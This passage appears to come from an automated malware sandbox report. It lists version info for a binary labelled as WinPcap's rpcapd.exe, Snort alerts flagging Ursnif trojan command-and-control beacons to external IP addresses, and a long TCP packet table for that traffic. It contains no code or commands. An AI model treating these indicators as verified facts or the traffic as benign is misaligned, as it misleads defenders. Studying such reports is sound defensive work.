                                          GDI32.dllGetCurrentPositionEx, GetBrushOrgEx, GetTextExtentExPointW

                                          Version Infos

                                          DescriptionData
                                          LegalCopyrightCopyright 2005-2007 CACE Technologies. Copyright 2003-2005 NetGroup, Politecnico di Torino.
                                          InternalNamerpcapd
                                          FileVersion4.0.0.1040
                                          CompanyNameCACE Technologies
                                          LegalTrademarks
                                          ProductNameWinPcap
                                          ProductVersion4.0.0.1040
                                          FileDescriptionRemote Packet Capture Daemon
                                          Build Description
                                          OriginalFilenamerpcapd.exe
                                          Translation0x0000 0x04b0

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          04/23/22-08:12:19.910177 04/23/22-08:12:19.910177TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976680192.168.2.4146.70.35.138
                                          04/23/22-08:12:21.823792 04/23/22-08:12:21.823792TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976680192.168.2.4146.70.35.138
                                          04/23/22-08:11:59.593120 04/23/22-08:11:59.593120TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976080192.168.2.413.107.42.16
                                          04/23/22-08:12:20.776897 04/23/22-08:12:20.776897TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976680192.168.2.4146.70.35.138

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Apr 23, 2022 08:12:19.885525942 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:19.909297943 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:19.909377098 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:19.910176992 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:19.933670998 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.288152933 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.288214922 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.288245916 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.288285017 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.288319111 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.288326025 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.288357973 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.288367033 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.288398027 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.288400888 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.288439989 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.288469076 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.288495064 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.288507938 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.288549900 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.288579941 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.288608074 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.288620949 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.288661957 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.288741112 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.328840971 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.328908920 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.328913927 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.328938007 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.328944921 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.328954935 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.328972101 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.328991890 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.328993082 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329011917 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.329025984 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329035044 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.329041004 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329042912 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.329065084 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329070091 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.329091072 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329108000 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329138994 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.329176903 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329232931 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329248905 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329309940 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329349995 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329365969 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329461098 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329534054 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.329545975 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.329549074 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.369694948 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.369724989 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.369743109 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.369766951 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.369785070 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.369803905 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.369812965 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.369837999 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.369841099 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.369853973 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.369879007 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.369882107 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.369931936 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.370174885 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.370202065 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.370218039 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.370239973 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.370259047 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.370285988 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.393351078 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.396121025 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.410522938 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.410547972 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.410562038 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.410579920 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.410598040 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.410609007 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.410725117 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.410767078 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.410773993 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.410815001 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.410842896 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.410861969 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.410912037 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.410948038 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.410972118 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.410988092 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.411020041 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.411101103 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.411129951 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.411148071 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.411159039 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.411170959 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.411206007 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.411315918 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.412249088 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.419718981 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.419918060 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.451852083 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.451911926 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.451941013 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.451982021 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452014923 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452053070 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452090025 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.452094078 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452142000 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.452146053 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452148914 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.452203989 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452258110 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.452260017 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452291012 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452332020 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452338934 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.452389002 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452431917 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452440023 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.452491045 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452534914 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452544928 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.452563047 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452603102 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452610016 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.452652931 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452697039 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452699900 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.452744961 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452785969 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452795029 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.452816963 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452867031 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.476562977 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.478291035 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.492733955 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.492798090 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.492827892 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.492868900 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.492909908 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.492949963 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.492969036 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.492980003 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.493019104 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.493021965 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.493073940 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.493140936 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.493189096 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.493216991 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.493252039 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.493256092 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.493299007 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.493310928 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.493340969 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.493371010 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.493392944 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.493411064 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.493460894 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.502005100 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.502226114 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.533426046 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.533483028 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.533514023 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.533551931 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.533582926 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.533679962 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.533727884 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.533785105 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.533830881 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.533859968 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.533890009 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.533900023 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.533941031 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.533970118 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.533992052 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.534012079 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.534051895 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.534080029 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.534101009 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.534121990 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.534184933 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.534219027 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.534255028 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.534259081 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.534308910 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.557888985 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.562295914 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.574759960 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.574799061 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.574820042 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.574847937 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.574876070 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.574903965 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.574923038 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.574925900 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.574980021 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.574986935 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.575087070 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.575123072 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.575145006 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.575150967 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.575176001 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.575196028 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.575232983 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.575243950 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.575258970 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.575280905 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.575297117 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.575333118 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.575344086 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.575361013 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.575378895 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.575397968 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.575443029 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.585979939 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.586055994 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.614809036 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.614859104 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.614887953 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.614926100 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.614953995 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.614955902 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.614994049 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.614998102 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.615000963 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.615478992 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.615521908 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.615550041 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.615552902 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.615573883 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.615590096 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.615634918 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.615827084 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.615866899 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.615890980 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.615895987 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.615911961 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.615937948 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.615988016 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.616008043 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.616049051 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.616051912 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.616075993 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.616096020 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.616142035 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.616189003 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.621948004 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.621989965 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.622016907 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.622056961 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.622097015 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.622147083 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.622201920 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.638639927 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.638742924 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.657005072 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657063961 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657090902 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657114029 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.657123089 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657160044 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.657176018 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657186031 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.657212973 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657233953 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.657349110 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657383919 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657407999 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657413006 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.657426119 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.657466888 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657500982 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657516003 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.657527924 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657543898 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.657629013 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657663107 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657685041 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657685995 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.657712936 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.657720089 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657757998 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657774925 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.657780886 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657798052 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.657901049 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657934904 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657949924 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.657960892 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657979965 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.658124924 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.658159971 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.658174038 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.658215046 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.658232927 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.658361912 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.658396959 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.658418894 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.658421040 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.658428907 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.662350893 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.662430048 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.698306084 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.698357105 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.698399067 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.698427916 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.698467970 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.698508978 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.698546886 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.698574066 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.698613882 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.698613882 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.698651075 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.698656082 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.698674917 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.698692083 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.698704958 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.698720932 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.698761940 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.698795080 CEST8049766146.70.35.138192.168.2.4
